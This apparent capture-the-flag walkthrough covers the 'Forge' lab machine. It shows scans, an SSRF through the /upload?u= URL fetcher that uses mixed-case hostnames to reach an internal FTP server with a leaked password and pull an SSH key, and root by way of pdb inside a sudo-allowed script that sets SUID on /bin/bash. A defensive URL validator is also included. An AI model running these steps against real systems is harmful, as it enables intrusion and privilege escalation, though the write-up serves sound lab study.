1. IP Address

# Machine Address
10.10.11.111

# Local Address
10.10.14.12

2. Nmap

sudo nmap -sC -sV -oA nmap/forge 10.10.11.111

Output:

Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-30 22:18 EDT
Nmap scan report for forge.htb (10.10.11.111)
Host is up (0.22s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
21/tcp filtered ftp
22/tcp open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4f:78:65:66:29:e4:87:6b:3c:cc:b4:3a:d2:57:20:ac (RSA)
|   256 79:df:3a:f1:fe:87:4a:57:b0:fd:4e:d0:54:c6:28:d9 (ECDSA)
|_  256 b0:58:11:40:6d:8c:bd:c5:72:aa:83:08:c5:51:fb:33 (ED25519)
80/tcp open     http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Gallery
Service Info: Host: 10.10.11.111; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.36 seconds

Bionic -> 4ubuntu0.3

3. Gobuster

No useful path was found:

/uploads              (Status: 301) [Size: 224] [--> http://forge.htb/uploads/]
/upload               (Status: 200) [Size: 929]
/static               (Status: 301) [Size: 307] [--> http://forge.htb/static/]
/.                    (Status: 200) [Size: 2050]
/server-status        (Status: 403) [Size: 274]

4. ffuf

ffuf -w /opt/SecLists/Discovery/DNS/shubs-subdomains.txt -u http://forge.htb/ -H "Host: FUZZ.forge.htb" -t 200 -fl 10

admin.forge.htb:

Only localhost is allowed! 

5. URL Upload

http://forge.htb/uploads/Mx21C8lAyzi9AyygJDeW

<!DOCTYPE html>
<html>
<head>
    <title>Admin Portal</title>
</head>
<body>
    <link rel="stylesheet" type="text/css" href="/static/css/main.css">
    <header>
            <nav>
                <h1 class=""><a href="/">Portal home</a></h1>
                <h1 class="align-right margin-right"><a href="/announcements">Announcements</a></h1>
                <h1 class="align-right"><a href="/upload">Upload image</a></h1>
            </nav>
    </header>
    <br><br><br><br>
    <br><br><br><br>
    <center><h1>Welcome Admins!</h1></center>
</body>

http://ADMIN.FORGE.HTB/announcements

<!DOCTYPE html>
<html>
<head>
    <title>Announcements</title>
</head>
<body>
    <link rel="stylesheet" type="text/css" href="/static/css/main.css">
    <link rel="stylesheet" type="text/css" href="/static/css/announcements.css">
    <header>
            <nav>
                <h1 class=""><a href="/">Portal home</a></h1>
                <h1 class="align-right margin-right"><a href="/announcements">Announcements</a></h1>
                <h1 class="align-right"><a href="/upload">Upload image</a></h1>
            </nav>
    </header>
    <br><br><br>
    <ul>
        <li>An internal ftp server has been setup with credentials as user:heightofsecurity123!</li>
        <li>The /upload endpoint now supports ftp, ftps, http and https protocols for uploading from url.</li>
        <li>The /upload endpoint has been configured for easy scripting of uploads, and for uploading an image, one can simply pass a url with ?u=&lt;url&gt;.</li>
    </ul>
</body>
</html>

user:heightofsecurity123!

http://aDmin.forGe.hTb/upload?u=ftp://user:heightofsecurity123!@FORGE.HTB
drwxr-xr-x    3 1000     1000         4096 Aug 04 19:23 snap
-rw-r-----    1 0        1000           33 Oct 30 18:02 user.txt
http://aDmin.forGe.hTb/upload?u=ftp://user:heightofsecurity123!@FORGE.HTB/.ssh/id_rsa
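The two requests above work because the /upload?u= fetcher accepts ftp:// and compares the host without normalising it, so a mixed-case spelling of the box's own name reaches the internal FTP server. The validator below is an added example of how a defender would harden that endpoint; it is not the box's own code. The hostnames forge.htb and admin.forge.htb come from this page, while the INTERNAL_HOSTS set and the resolver hook are assumptions.

```python
"""Server-side check for a "fetch image from URL" feature (added example)."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}          # no ftp/ftps/file/gopher
# Names the application itself answers on (assumed list for this example);
# fetching any of them loops back into the internal network.
INTERNAL_HOSTS = {"localhost", "forge.htb", "admin.forge.htb"}


def is_internal_ip(ip_str):
    """True for loopback, private, link-local and other non-global ranges."""
    try:
        ip = ipaddress.ip_address(ip_str)
    except ValueError:
        return False                         # not an IP literal
    return not ip.is_global


def check_upload_url(url, resolver=None):
    """Return (ok, reason).  The host is lower-cased before comparison, so
    aDmin.forGe.hTb is treated exactly like admin.forge.htb; embedded
    credentials (user:pass@host) and non-HTTP schemes are refused."""
    parts = urlsplit(url.strip())
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {scheme!r} not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL not allowed"
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return False, "missing host"
    if host in INTERNAL_HOSTS or host.endswith(".forge.htb"):
        return False, f"host {host!r} is internal"
    if is_internal_ip(host):
        return False, f"address {host!r} is not globally routable"
    # A public-looking name may still resolve to 127.0.0.1 or 10.x; resolve
    # and re-check.  The hook exists so the check can run offline in tests.
    resolve = resolver or (
        lambda h: [r[4][0] for r in socket.getaddrinfo(h, None)])
    for addr in resolve(host):
        if is_internal_ip(addr):
            return False, f"{host!r} resolves to internal address {addr}"
    return True, "ok"
```

Resolving once at check time still leaves a DNS-rebinding window; the fetch itself should connect to the address that was validated rather than resolving the name a second time.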

id_rsa:

-----BEGIN OPENSSH PRIVATE KEY-----
PRIVATE KEY
-----END OPENSSH PRIVATE KEY-----

User:

16eeaf74*************

6. Enumeration

sudo -l:

User user may run the following commands on forge:
    (ALL : ALL) NOPASSWD: /usr/bin/python3 /opt/remote-manage.py

remote-manage.py can be abused. While it is listening on a port, open a new terminal session, ssh in again and connect with nc localhost <port>. Then, from the first terminal session, type anything at all and the script drops into pdb.

7. Exploitation

import os
os.system ('chmod u+s /bin/bash')
exit

To get root:

/bin/bash -p